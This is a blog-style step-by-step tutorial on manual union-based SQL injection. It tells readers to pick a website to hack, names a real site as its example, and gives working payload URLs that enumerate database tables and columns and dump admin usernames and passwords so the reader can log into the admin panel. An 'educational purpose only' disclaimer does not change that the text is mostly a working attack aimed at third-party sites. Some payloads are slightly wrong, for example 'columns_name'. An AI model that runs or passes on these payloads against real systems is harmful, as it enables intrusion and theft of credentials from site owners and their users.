THIS IS FOR EDUCATIONAL PURPOSE ONLY, I AM NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITIES DONE BY VISITORS, THIS IS FOR ETHICAL PURPOSE ONLY
We will start with what Actually SQL injections are?
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application which allow attacker to see the contents stored in database. SQL stands for Structured Query Language. Its a high level Language close to human.
Remember, This Vulnerability only occurs when the user's output is not filtered or improperly filtered.
example: http://www.cobranet.org/about.php?id=1
Step 1:
Choose a website which you wanna hack, in my case i selected the website as shown in the picture.
Step 2:
Now, To check whether it is vulnerable or not by simply using the asterisk ' in url. and simply hit enter.
If No error or changing is found in the page, That means this website is not vulnerable. Here, In my case i found changes. This means this website is vulnerable :D
Step 3:
Let's Proceed Further, Now We have to find how many number of columns are available in the database.
The way i will do this is just by simply adding order by 1-- in the url.
Increase the number from 1 to whatever till it popup the error.
In my case, It shows error on order by 8-- This means there are 7 columns in database! ;)
Step 4:
So to find the vulnerable column, we have to execute it by using "UNION" and "SELECT" command and remember put a hyphen or minus (-) before 1 for avoiding error.
example: http://www.cobranet.org/about.php?id=-1
code: http://xxxx/Products.php?prodId=-4 union select 1,2,3,4,5,6,7--
As You can see! column 2 is vulnerable, In this case, we will simply replace 2 by version() or @@version to find out the version of the server.
In some cases, some servers are not able to directly understand the command. For this purpose, You need to convert it. You need to replace @@version with unhex(hex(@@version))
So, The server is using Sql version 5.5.41, Also we know the OS is Ubuntu.
Now, We have to find out the user; we simply get it by replacing version() with user().
As you can see, user is chaubara@localhost.
Now, We have to find out the user; we simply get it by replacing user() with database().
As you can see, database is chaubara.
Step 5:
Now we hae to extract the tables from the sql database, the way we will do this by replacing the vulnerable column with table_name and add prefix +from+information_schema.tables. The final url will be
http://xxxx/Products.php?prodId=-4 union select 1,table_name,3,4,5,6,7 from information_schema.tables--
As you can see, the name of the table is CHARACTER_SETS. However, this is just one table. We can replace the table_name with group_concat(table_name) to get all tables
code: http://xxxx/Products.php?prodId=-4 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables.
Getting into this conclusion,the ending of the last table is incomplete. To correct this, you can modify the end of the url to something like
http://xxxx/Products.php?prodId=-4 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()--
Step 6:
That's it ! how we have to obtain the columns. The way i will do this by simply replacing table_name with column_name and information_schema.tables with information_schema.columns. The final url will be
http://xxxx/Products.php?prodId=-4 union select 1,group_concat(columns_name),3,4,5,6,7 from information_schema.columns where table_schema=database()--
Step 7:
We have now Tables as well as columns. Now we will replace it with the column we want to obtain data from. Lets assume we want the data from the first table "admin". We will put the following URL-
http://xxxx/Products.php?prodId=-4 union select 1,group_concat(columns_name),3,4,5,6,7 from information_schema.columns where table_name=0x61646d696e
Here, 0x is prefix and admin in its hex code is 61646d696e
you can convert your text into the hex code by using convertor
Step 8:
umm..sounds interesting! Lets find out the username and password ;)
code: http://xxxx/Products.php?prodId=-4 union select 1,group_concat(id,0x3a,username,0x3a,password),3,4,5,6,7 from admin--
where, is a hex code of (:) colon; This we use to organise our result in a better way!
And this is how we sucessfully get the username and password without using any tool. ;)
Now Find the admin Panel and log into it as an Administrator ;)
Happy Hacking! If Any Query Feel Free to ask in Comments!
Thank-You.
THANK YOU !!!
ReplyDelete